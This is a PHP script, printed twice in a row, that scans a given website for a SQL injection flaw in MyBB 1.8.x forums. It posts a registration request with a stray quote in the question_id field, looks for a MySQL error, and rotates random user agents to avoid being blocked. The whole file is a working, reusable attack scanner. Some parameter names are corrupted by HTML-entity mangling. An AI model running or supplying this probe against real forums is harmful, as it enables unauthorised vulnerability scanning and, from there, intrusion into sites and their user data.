<?php if ( isset( $_GET[ 'q' ] ) ) { $host = $_GET[ 'q' ]; //Making sure http or https is set if ( substr( $host, 0, 4 ) == "http" ) { $protocol = "http"; if ( substr( $host, 0, 5 ) == "https" ) { $protocol = "https"; } //Removing trailing slashes if ( substr( $host, -1 ) == '/' ) { $host = substr( $host, 0, -1 ); } //Initial SQL Injection check $newHost = $host . '/member.php'; $data = "regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action=do_register®submit=Submit+Registration!&question_id='"; $response = SendPost( $newHost, $data ); if ( strpos( $response, "You have an error in your SQL syntax" ) !== false ) { printf( "%s is vulnerable to MyBB 1.8.X SQL Injection!", $host ); } else { printf( "%s is not vulnerable to MyBB 1.8.X SQL Injection!", $host ); } } else { echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums"; } } else { echo "Invalid parameters, are you drunk?"; } //Dont get useragent blocked function getRandomUserAgent() { $userAgents = array( "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50", "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48" ); $random = rand( 0, count( $userAgents ) - 1 ); return $userAgents[ $random ]; } //Send a post request function SendPost( $site, $post ) { $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, "$site" ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_USERAGENT, getRandomUserAgent() ); curl_setopt( $ch, CURLOPT_POSTFIELDS, $post ); $response = curl_exec( $ch ); curl_close( $ch ); return $response; } ?> Code <?php if ( isset( $_GET[ 'q' ] ) ) { $host = $_GET[ 'q' ]; //Making sure http or https is set if ( substr( $host, 0, 4 ) == "http" ) { $protocol = "http"; if ( substr( $host, 0, 5 ) == "https" ) { $protocol = "https"; } //Removing trailing slashes if ( substr( $host, -1 ) == '/' ) { $host = substr( $host, 0, -1 ); } //Initial SQL Injection check $newHost = $host . '/member.php'; $data = "regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action=do_register®submit=Submit+Registration!&question_id='"; $response = SendPost( $newHost, $data ); if ( strpos( $response, "You have an error in your SQL syntax" ) !== false ) { printf( "%s is vulnerable to MyBB 1.8.X SQL Injection!", $host ); } else { printf( "%s is not vulnerable to MyBB 1.8.X SQL Injection!", $host ); } } else { echo "Invalid host, needs to have a protocol -> http://apples.org/path/to/forums"; } } else { echo "Invalid parameters, are you drunk?"; } //Dont get useragent blocked function getRandomUserAgent() { $userAgents = array( "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50", "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/48 (like Gecko) Safari/48" ); $random = rand( 0, count( $userAgents ) - 1 ); return $userAgents[ $random ]; } //Send a post request function SendPost( $site, $post ) { $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, "$site" ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_USERAGENT, getRandomUserAgent() ); curl_setopt( $ch, CURLOPT_POSTFIELDS, $post ); $response = curl_exec( $ch ); curl_close( $ch ); return $response; } ?>